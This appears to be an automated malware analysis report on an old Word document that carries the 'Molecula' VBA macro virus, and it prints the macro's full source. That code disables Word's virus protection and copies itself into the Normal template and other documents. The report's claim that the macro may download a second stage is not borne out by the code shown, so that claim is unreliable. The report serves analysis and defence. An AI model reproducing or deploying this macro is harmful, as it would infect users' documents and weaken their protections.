Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9b63dfb258a15996…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 54.5 KB
Created: 2000-10-01 21:57:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: f6ce592f3e8494a3ff5212a4768283d2
SHA-1: e12812e6b86ef45f3c32edf3e6b31677ad097027
SHA-256: 9b63dfb258a15996e82b8ad892de409e2ae2727c50fd923573f46740ea41b093
Risk score: 180

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic); T1566.001 (Spearphishing Attachment)

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro code, identified as 'Molecula' and 'WM.Molecula by e[ax]', appears to be designed to bypass antivirus heuristics and potentially download a second-stage payload. The presence of the 'Document_Open' macro and the heuristic firings strongly suggest a malicious intent, likely related to malware delivery.

Heuristics (3)

  • ClamAV: Doc.Trojan.Jedan-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Jedan-1
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1147 bytes
SHA-256: 00c6087d19b3141ceffecfd60abd5fdef9c894aaf5be60f88e16e4a1f178d0fb
Detection: ClamAV: Doc.Trojan.Jedan-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Molecula
Private Sub Document_Open(): Const nula = 0: Const jedan = 1: Options.VirusProtection = nula
If Not ThisDocument = ActiveDocument Then Set a = ActiveDocument Else Set a = NormalTemplate
Set b = a.VBProject: Set c = b.VBComponents(1): Set d = c.CodeModule
With d: g = Strings.Trim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(jedan, _
ThisDocument.VBProject.VBComponents(1).CodeModule.countoflines))
If .Lines(1, 1) <> "'Molecula" Then
.deletelines jedan, d.countoflines
.insertlines jedan, g
End If
End With
If Day(Now()) = jedan Then
MsgBox "...i posle svega ja sam jos tu...tu medju Vama!", vbCritical, "...Molecula"
End If
End Sub
'WM.Molecula by e[ax]
'Another virus that can bypass NAV2K and AVP heuristics
'..and which uses the String method of infection!
'Greetings to everyone on #virus and #vxers